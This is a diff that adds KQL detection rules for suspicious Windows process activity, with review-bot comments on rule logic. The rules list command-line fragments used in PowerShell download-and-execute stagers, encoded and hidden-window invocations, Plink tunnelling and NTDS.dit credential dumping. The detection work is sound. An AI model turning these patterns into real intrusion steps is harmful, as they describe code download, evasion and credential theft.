+// Tags: attack.defense-evasion, attack.t1070.004
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "ping" and ProcessCommandLine contains "del ") and (ProcessCommandLine contains " -n " or ProcessCommandLine contains " /n " or ProcessCommandLine contains " –n " or ProcessCommandLine contains " —n " or ProcessCommandLine contains " ―n ") and (ProcessCommandLine contains " -f " or ProcessCommandLine contains " /f " or ProcessCommandLine contains " –f " or ProcessCommandLine contains " —f " or ProcessCommandLine contains " ―f " or ProcessCommandLine contains " -q " or ProcessCommandLine contains " /q " or ProcessCommandLine contains " –q " or ProcessCommandLine contains " —q " or ProcessCommandLine contains " ―q ") and ProcessCommandLine contains "Nul"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_plink_port_forwarding.kql b/KQL/rules/windows/process_creation/suspicious_plink_port_forwarding.kql
new file mode 100644
index 00000000..d1f4c7e6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_plink_port_forwarding.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Plink Port Forwarding
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-01-19
+// Level: high
+// Description: Detects suspicious Plink tunnel port forwarding to a local port
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1572, attack.lateral-movement, attack.t1021.001
+// False Positives:
+// - Administrative activity using a remote port forwarding to a local port
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -R " and ProcessVersionInfoFileDescription =~ "Command-line SSH, Telnet, and Rlogin client"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_powercfg_execution_to_change_lock_screen_timeout.kql b/KQL/rules/windows/process_creation/suspicious_powercfg_execution_to_change_lock_screen_timeout.kql
new file mode 100644
index 00000000..b47137d6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_powercfg_execution_to_change_lock_screen_timeout.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Powercfg Execution To Change Lock Screen Timeout
+// Author: frack113
+// Date: 2022-11-18
+// Level: medium
+// Description: Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\powercfg.exe" or ProcessVersionInfoOriginalFileName =~ "PowerCfg.exe") and ((ProcessCommandLine contains "/setacvalueindex " and ProcessCommandLine contains "SCHEME_CURRENT" and ProcessCommandLine contains "SUB_VIDEO" and ProcessCommandLine contains "VIDEOCONLOCK") or (ProcessCommandLine contains "-change " and ProcessCommandLine contains "-standby-timeout-"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_powershell_download_and_execute_pattern.kql b/KQL/rules/windows/process_creation/suspicious_powershell_download_and_execute_pattern.kql
new file mode 100644
index 00000000..73426311
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_powershell_download_and_execute_pattern.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious PowerShell Download and Execute Pattern
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-28
+// Level: high
+// Description: Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+// - Software installers that pull packages from remote systems and execute them
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "IEX ((New-Object Net.WebClient).DownloadString" or ProcessCommandLine contains "IEX (New-Object Net.WebClient).DownloadString" or ProcessCommandLine contains "IEX((New-Object Net.WebClient).DownloadString" or ProcessCommandLine contains "IEX(New-Object Net.WebClient).DownloadString" or ProcessCommandLine contains " -command (New-Object System.Net.WebClient).DownloadFile(" or ProcessCommandLine contains " -c (New-Object System.Net.WebClient).DownloadFile("
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_powershell_encoded_command_patterns.kql b/KQL/rules/windows/process_creation/suspicious_powershell_encoded_command_patterns.kql
new file mode 100644
index 00000000..a820413c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_powershell_encoded_command_patterns.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious PowerShell Encoded Command Patterns
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-05-24
+// Level: high
+// Description: Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+// - Other tools that work with encoded scripts in the command line instead of script files
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " JAB" or ProcessCommandLine contains " SUVYI" or ProcessCommandLine contains " SQBFAFgA" or ProcessCommandLine contains " aWV4I" or ProcessCommandLine contains " IAB" or ProcessCommandLine contains " PAA" or ProcessCommandLine contains " aQBlAHgA") and (ProcessCommandLine contains " -e " or ProcessCommandLine contains " -en " or ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -enco") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.Exe", "pwsh.dll")))) and (not((InitiatingProcessFolderPath contains "C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or InitiatingProcessFolderPath contains "\\gc_worker.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_powershell_iex_execution_patterns.kql b/KQL/rules/windows/process_creation/suspicious_powershell_iex_execution_patterns.kql
new file mode 100644
index 00000000..75a1dcc8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_powershell_iex_execution_patterns.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious PowerShell IEX Execution Patterns
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-03-24
+// Level: high
+// Description: Detects suspicious ways to run Invoke-Execution using IEX alias
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+// - Legitimate scripts that use IEX
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains " | iex;" or ProcessCommandLine contains " | iex " or ProcessCommandLine contains " | iex}" or ProcessCommandLine contains " | IEX ;" or ProcessCommandLine contains " | IEX -Error" or ProcessCommandLine contains " | IEX (new" or ProcessCommandLine contains ");IEX ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) and (ProcessCommandLine contains "::FromBase64String" or ProcessCommandLine contains ".GetString([System.Convert]::")) or (ProcessCommandLine contains ")|iex;$" or ProcessCommandLine contains ");iex($" or ProcessCommandLine contains ");iex $" or ProcessCommandLine contains " | IEX | " or ProcessCommandLine contains " | iex\\\"")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_powershell_invocations_specific_processcreation.kql b/KQL/rules/windows/process_creation/suspicious_powershell_invocations_specific_processcreation.kql
new file mode 100644
index 00000000..821b70f6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_powershell_invocations_specific_processcreation.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious PowerShell Invocations - Specific - ProcessCreation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-05
+// Level: medium
+// Description: Detects suspicious PowerShell invocation command parameters
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "-nop" and ProcessCommandLine contains " -w " and ProcessCommandLine contains "hidden" and ProcessCommandLine contains " -c " and ProcessCommandLine contains "[Convert]::FromBase64String") or (ProcessCommandLine contains " -w " and ProcessCommandLine contains "hidden" and ProcessCommandLine contains "-ep" and ProcessCommandLine contains "bypass" and ProcessCommandLine contains "-Enc") or (ProcessCommandLine contains " -w " and ProcessCommandLine contains "hidden" and ProcessCommandLine contains "-noni" and ProcessCommandLine contains "-nop" and ProcessCommandLine contains " -c " and ProcessCommandLine contains "iex" and ProcessCommandLine contains "New-Object") or (ProcessCommandLine contains "iex" and ProcessCommandLine contains "New-Object" and ProcessCommandLine contains "Net.WebClient" and ProcessCommandLine contains ".Download") or (ProcessCommandLine contains "powershell" and ProcessCommandLine contains "reg" and ProcessCommandLine contains "add" and ProcessCommandLine contains "\\software\\") or (ProcessCommandLine contains "bypass" and ProcessCommandLine contains "-noprofile" and ProcessCommandLine contains "-windowstyle" and ProcessCommandLine contains "hidden" and ProcessCommandLine contains "new-object" and ProcessCommandLine contains "system.net.webclient" and ProcessCommandLine contains ".download")) and (not((ProcessCommandLine contains "(New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1" or ProcessCommandLine contains "Write-ChocolateyWarning")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_powershell_mailbox_export_to_share.kql b/KQL/rules/windows/process_creation/suspicious_powershell_mailbox_export_to_share.kql
new file mode 100644
index 00000000..d59836e8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_powershell_mailbox_export_to_share.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious PowerShell Mailbox Export to Share
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-08-07
+// Level: critical
+// Description: Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "New-MailboxExportRequest" and ProcessCommandLine contains " -Mailbox " and ProcessCommandLine contains " -FilePath \\\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_powershell_parameter_substring.kql b/KQL/rules/windows/process_creation/suspicious_powershell_parameter_substring.kql
new file mode 100644
index 00000000..3c9d2594
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_powershell_parameter_substring.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious PowerShell Parameter Substring
+// Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)
+// Date: 2019-01-16
+// Level: high
+// Description: Detects suspicious PowerShell invocation with a parameter substring
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -windowstyle h " or ProcessCommandLine contains " -windowstyl h" or ProcessCommandLine contains " -windowsty h" or ProcessCommandLine contains " -windowst h" or ProcessCommandLine contains " -windows h" or ProcessCommandLine contains " -windo h" or ProcessCommandLine contains " -wind h" or ProcessCommandLine contains " -win h" or ProcessCommandLine contains " -wi h" or ProcessCommandLine contains " -win h " or ProcessCommandLine contains " -win hi " or ProcessCommandLine contains " -win hid " or ProcessCommandLine contains " -win hidd " or ProcessCommandLine contains " -win hidde " or ProcessCommandLine contains " -NoPr " or ProcessCommandLine contains " -NoPro " or ProcessCommandLine contains " -NoProf " or ProcessCommandLine contains " -NoProfi " or ProcessCommandLine contains " -NoProfil " or ProcessCommandLine contains " -nonin " or ProcessCommandLine contains " -nonint " or ProcessCommandLine contains " -noninte " or ProcessCommandLine contains " -noninter " or ProcessCommandLine contains " -nonintera " or ProcessCommandLine contains " -noninterac " or ProcessCommandLine contains " -noninteract " or ProcessCommandLine contains " -noninteracti " or ProcessCommandLine contains " -noninteractiv " or ProcessCommandLine contains " -ec " or ProcessCommandLine contains " -encodedComman " or ProcessCommandLine contains " -encodedComma " or ProcessCommandLine contains " -encodedComm " or ProcessCommandLine contains " -encodedCom " or ProcessCommandLine contains " -encodedCo " or ProcessCommandLine contains " -encodedC " or ProcessCommandLine contains " -encoded " or ProcessCommandLine contains " -encode " or ProcessCommandLine contains " -encod " or ProcessCommandLine contains " -enco " or ProcessCommandLine contains " -en " or ProcessCommandLine contains " -executionpolic " or ProcessCommandLine contains " -executionpoli " or ProcessCommandLine contains " -executionpol " or ProcessCommandLine contains " -executionpo " or ProcessCommandLine contains " -executionp " or ProcessCommandLine contains " -execution bypass" or ProcessCommandLine contains " -executio bypass" or ProcessCommandLine contains " -executi bypass" or ProcessCommandLine contains " -execut bypass" or ProcessCommandLine contains " -execu bypass" or ProcessCommandLine contains " -exec bypass" or ProcessCommandLine contains " -exe bypass" or ProcessCommandLine contains " -ex bypass" or ProcessCommandLine contains " -ep bypass" or ProcessCommandLine contains " /windowstyle h " or ProcessCommandLine contains " /windowstyl h" or ProcessCommandLine contains " /windowsty h" or ProcessCommandLine contains " /windowst h" or ProcessCommandLine contains " /windows h" or ProcessCommandLine contains " /windo h" or ProcessCommandLine contains " /wind h" or ProcessCommandLine contains " /win h" or ProcessCommandLine contains " /wi h" or ProcessCommandLine contains " /win h " or ProcessCommandLine contains " /win hi " or ProcessCommandLine contains " /win hid " or ProcessCommandLine contains " /win hidd " or ProcessCommandLine contains " /win hidde " or ProcessCommandLine contains " /NoPr " or ProcessCommandLine contains " /NoPro " or ProcessCommandLine contains " /NoProf " or ProcessCommandLine contains " /NoProfi " or ProcessCommandLine contains " /NoProfil " or ProcessCommandLine contains " /nonin " or ProcessCommandLine contains " /nonint " or ProcessCommandLine contains " /noninte " or ProcessCommandLine contains " /noninter " or ProcessCommandLine contains " /nonintera " or ProcessCommandLine contains " /noninterac " or ProcessCommandLine contains " /noninteract " or ProcessCommandLine contains " /noninteracti " or ProcessCommandLine contains " /noninteractiv " or ProcessCommandLine contains " /ec " or ProcessCommandLine contains " /encodedComman " or ProcessCommandLine contains " /encodedComma " or ProcessCommandLine contains " /encodedComm " or ProcessCommandLine contains " /encodedCom " or ProcessCommandLine contains " /encodedCo " or ProcessCommandLine contains " /encodedC " or ProcessCommandLine contains " /encoded " or ProcessCommandLine contains " /encode " or ProcessCommandLine contains " /encod " or ProcessCommandLine contains " /enco " or ProcessCommandLine contains " /en " or ProcessCommandLine contains " /executionpolic " or ProcessCommandLine contains " /executionpoli " or ProcessCommandLine contains " /executionpol " or ProcessCommandLine contains " /executionpo " or ProcessCommandLine contains " /executionp " or ProcessCommandLine contains " /execution bypass" or ProcessCommandLine contains " /executio bypass" or ProcessCommandLine contains " /executi bypass" or ProcessCommandLine contains " /execut bypass" or ProcessCommandLine contains " /execu bypass" or ProcessCommandLine contains " /exec bypass" or ProcessCommandLine contains " /exe bypass" or ProcessCommandLine contains " /ex bypass" or ProcessCommandLine contains " /ep bypass") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_powershell_parent_process.kql b/KQL/rules/windows/process_creation/suspicious_powershell_parent_process.kql
new file mode 100644
index 00000000..f83f1038
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_powershell_parent_process.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious PowerShell Parent Process
+// Author: Teymur Kheirkhabarov, Harish Segar
+// Date: 2020-03-20
+// Level: high
+// Description: Detects a suspicious or uncommon parent processes of PowerShell
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+// - Other scripts
+
+DeviceProcessEvents
+| where (InitiatingProcessFolderPath contains "tomcat" or (InitiatingProcessFolderPath endswith "\\amigo.exe" or InitiatingProcessFolderPath endswith "\\browser.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\iexplore.exe" or InitiatingProcessFolderPath endswith "\\jbosssvc.exe" or InitiatingProcessFolderPath endswith "\\microsoftedge.exe" or InitiatingProcessFolderPath endswith "\\microsoftedgecp.exe" or InitiatingProcessFolderPath endswith "\\MicrosoftEdgeSH.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\sqlagent.exe" or InitiatingProcessFolderPath endswith "\\sqlserver.exe" or InitiatingProcessFolderPath endswith "\\sqlservr.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe")) and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessCommandLine contains "/c powershell" or ProcessCommandLine contains "/c pwsh") or ProcessVersionInfoFileDescription =~ "Windows PowerShell" or ProcessVersionInfoProductName =~ "PowerShell Core 6" or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_process_by_web_server_process.kql b/KQL/rules/windows/process_creation/suspicious_process_by_web_server_process.kql
new file mode 100644
index 00000000..387273e9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_process_by_web_server_process.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Process By Web Server Process
+// Author: Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-01-16
+// Level: high
+// Description: Detects potentially suspicious processes being spawned by a web server process which could be the result of a successfully placed web shell or exploitation
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.initial-access, attack.t1505.003, attack.t1190
+// False Positives:
+// - Particular web applications may spawn a shell process legitimately
+
+DeviceProcessEvents
+| where (((InitiatingProcessFolderPath contains "-tomcat-" or InitiatingProcessFolderPath contains "\\tomcat") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or ((InitiatingProcessCommandLine contains "CATALINA_HOME" or InitiatingProcessCommandLine contains "catalina.home" or InitiatingProcessCommandLine contains "catalina.jar") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or (InitiatingProcessFolderPath endswith "\\caddy.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\php.exe" or InitiatingProcessFolderPath endswith "\\tomcat.exe" or InitiatingProcessFolderPath endswith "\\UMWorkerProcess.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\ws_TomcatService.exe")) and (FolderPath endswith "\\arp.exe" or FolderPath endswith "\\at.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\dsget.exe" or FolderPath endswith "\\hostname.exe" or FolderPath endswith "\\nbtstat.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netdom.exe" or FolderPath endswith "\\netsh.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\ntdsutil.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\qprocess.exe" or FolderPath endswith "\\query.exe" or FolderPath endswith "\\qwinsta.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\sc.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wusa.exe") and (not(((ProcessCommandLine endswith "Windows\\system32\\cmd.exe /c C:\\ManageEngine\\ADManager \"Plus\\ES\\bin\\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt" and InitiatingProcessFolderPath endswith "\\java.exe") or ((ProcessCommandLine contains "sc query" and ProcessCommandLine contains "ADManager Plus") and InitiatingProcessFolderPath endswith "\\java.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_process_created_via_wmic_exe.kql b/KQL/rules/windows/process_creation/suspicious_process_created_via_wmic_exe.kql
new file mode 100644
index 00000000..bb7f2743
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_process_created_via_wmic_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Process Created Via Wmic.EXE
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-10-12
+// Level: high
+// Description: Detects WMIC executing "process call create" with suspicious calls to processes such as "rundll32", "regsrv32", etc.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd.exe /r " or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "%ProgramData%" or ProcessCommandLine contains "%appdata%" or ProcessCommandLine contains "%comspec%" or ProcessCommandLine contains "%localappdata%") and (ProcessCommandLine contains "process " and ProcessCommandLine contains "call " and ProcessCommandLine contains "create ")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_process_execution_from_fake_recycle_bin_folder.kql b/KQL/rules/windows/process_creation/suspicious_process_execution_from_fake_recycle_bin_folder.kql
new file mode 100644
index 00000000..9ae2044d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_process_execution_from_fake_recycle_bin_folder.kql
@@ -0,0 +1,12 @@ +// Title: Suspicious Process Execution From Fake Recycle.Bin Folder +// Author: X__Junior (Nextron Systems) +// Date: 2023-07-12 +// Level: high +// Description: Detects process execution from a fake recycle bin folder, often used to avoid security solution. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where FolderPath contains "RECYCLERS.BIN\\" or FolderPath contains "RECYCLER.BIN\\" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_process_masquerading_as_svchost_exe.kql b/KQL/rules/windows/process_creation/suspicious_process_masquerading_as_svchost_exe.kql new file mode 100644 index 00000000..bca7f601 --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_process_masquerading_as_svchost_exe.kql @@ -0,0 +1,13 @@ +// Title: Suspicious Process Masquerading As SvcHost.EXE +// Author: Swachchhanda Shrawan Poudel +// Date: 2024-08-07 +// Level: high +// Description: Detects a suspicious process that is masquerading as the legitimate "svchost.exe" by naming its binary "svchost.exe" and executing from an uncommon location. +// Adversaries often disguise their malicious binaries by naming them after legitimate system processes like "svchost.exe" to evade detection. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.005 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where FolderPath endswith "\\svchost.exe" and (not(((FolderPath in~ ("C:\\Windows\\System32\\svchost.exe", "C:\\Windows\\SysWOW64\\svchost.exe")) or ProcessVersionInfoOriginalFileName =~ "svchost.exe"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_process_parents.kql b/KQL/rules/windows/process_creation/suspicious_process_parents.kql new file mode 100644 index 00000000..0ec096c9 --- /dev/null 
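Review bot: The exclusion `ProcessVersionInfoOriginalFileName =~ "svchost.exe"` in the suspicious_process_masquerading_as_svchost_exe hunk exempts any binary whose own version resource carries that name, so the rule effectively fires only on an out-of-place svchost.exe that does not claim the expected metadata, and that limitation is not recorded anywhere in the header. A comment such as `// Note: the OriginalFileName exclusion trusts the binary's own version resource; corroborate hits with signer or hash data before tuning on it` would make the coverage explicit for whoever maintains the rule. The path allow-list is also hard-coded to `C:\\Windows\\System32` and `C:\\Windows\\SysWOW64`, which is reasonable for the common case but is an assumption worth stating in the False Positives block.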
+++ b/KQL/rules/windows/process_creation/suspicious_process_parents.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Process Parents +// Author: Florian Roth (Nextron Systems) +// Date: 2022-03-21 +// Level: high +// Description: Detects suspicious parent processes that should not have any children or should only have a single possible child program +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036 + +DeviceProcessEvents +| where (InitiatingProcessFolderPath endswith "\\minesweeper.exe" or InitiatingProcessFolderPath endswith "\\winver.exe" or InitiatingProcessFolderPath endswith "\\bitsadmin.exe") or ((InitiatingProcessFolderPath endswith "\\csrss.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\eventvwr.exe" or InitiatingProcessFolderPath endswith "\\calc.exe" or InitiatingProcessFolderPath endswith "\\notepad.exe") and (not((isnull(FolderPath) or (FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\wermgr.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\mmc.exe" or FolderPath endswith "\\win32calc.exe" or FolderPath endswith "\\notepad.exe"))))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_process_patterns_ntds_dit_exfil.kql b/KQL/rules/windows/process_creation/suspicious_process_patterns_ntds_dit_exfil.kql new file mode 100644 index 00000000..17947643 --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_process_patterns_ntds_dit_exfil.kql 
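Review bot: `isnull(FolderPath)` in the `not(...)` filter of the suspicious_process_parents hunk is probably too narrow: in Advanced Hunting a missing string column is, as far as I know, reported as an empty string rather than null, so the rows this clause is meant to exempt would still pass through. `isempty(FolderPath)` is true for both null and the empty string and is the safer translation, i.e. `not((isempty(FolderPath) or (FolderPath endswith "\\WerFault.exe" ...`. If the converter emits `isnull` for every Sigma null match, the fix belongs in helper.py rather than in this generated file, otherwise every regenerated rule will reintroduce it.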
@@ -0,0 +1,10 @@ +// Title: Suspicious Process Patterns NTDS.DIT Exfil +// Author: Florian Roth (Nextron Systems) +// Date: 2022-03-11 +// Level: high +// Description: Detects suspicious process patterns used in NTDS.DIT exfiltration +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.003 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "ac i ntds" and ProcessCommandLine contains "create full") or (ProcessCommandLine contains "/c copy " and ProcessCommandLine contains "\\windows\\ntds\\ntds.dit") or (ProcessCommandLine contains "activate instance ntds" and ProcessCommandLine contains "create full") or (ProcessCommandLine contains "powershell" and ProcessCommandLine contains "ntds.dit") or ((FolderPath endswith "\\NTDSDump.exe" or FolderPath endswith "\\NTDSDumpEx.exe") or (ProcessCommandLine contains "ntds.dit" and ProcessCommandLine contains "system.hiv") or ProcessCommandLine contains "NTDSgrab.ps1")) or (((InitiatingProcessFolderPath contains "\\apache" or InitiatingProcessFolderPath contains "\\tomcat" or InitiatingProcessFolderPath contains "\\AppData\\" or InitiatingProcessFolderPath contains "\\Temp\\" or InitiatingProcessFolderPath contains "\\Public\\" or InitiatingProcessFolderPath contains "\\PerfLogs\\") or (FolderPath contains "\\apache" or FolderPath contains "\\tomcat" or FolderPath contains "\\AppData\\" or FolderPath contains "\\Temp\\" or FolderPath contains "\\Public\\" or FolderPath contains "\\PerfLogs\\")) and ProcessCommandLine contains "ntds.dit") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_process_start_locations.kql b/KQL/rules/windows/process_creation/suspicious_process_start_locations.kql new file mode 100644 index 00000000..78980468 --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_process_start_locations.kql 
@@ -0,0 +1,12 @@ +// Title: Suspicious Process Start Locations +// Author: juju4, Jonhnathan Ribeiro, oscd.community +// Date: 2019-01-16 +// Level: medium +// Description: Detects suspicious process run from unusual locations +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036, car.2013-05-002 +// False Positives: +// - False positives depend on scripts and administrative tools used in the monitored environment + +DeviceProcessEvents +| where (FolderPath contains ":\\RECYCLER\\" or FolderPath contains ":\\SystemVolumeInformation\\") or (FolderPath startswith "C:\\Windows\\Tasks\\" or FolderPath startswith "C:\\Windows\\debug\\" or FolderPath startswith "C:\\Windows\\fonts\\" or FolderPath startswith "C:\\Windows\\help\\" or FolderPath startswith "C:\\Windows\\drivers\\" or FolderPath startswith "C:\\Windows\\addins\\" or FolderPath startswith "C:\\Windows\\cursors\\" or FolderPath startswith "C:\\Windows\\system32\\tasks\\") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/suspicious_processes_spawned_by_java_exe.kql b/KQL/rules/windows/process_creation/suspicious_processes_spawned_by_java_exe.kql new file mode 100644 index 00000000..0c007948 --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_processes_spawned_by_java_exe.kql 
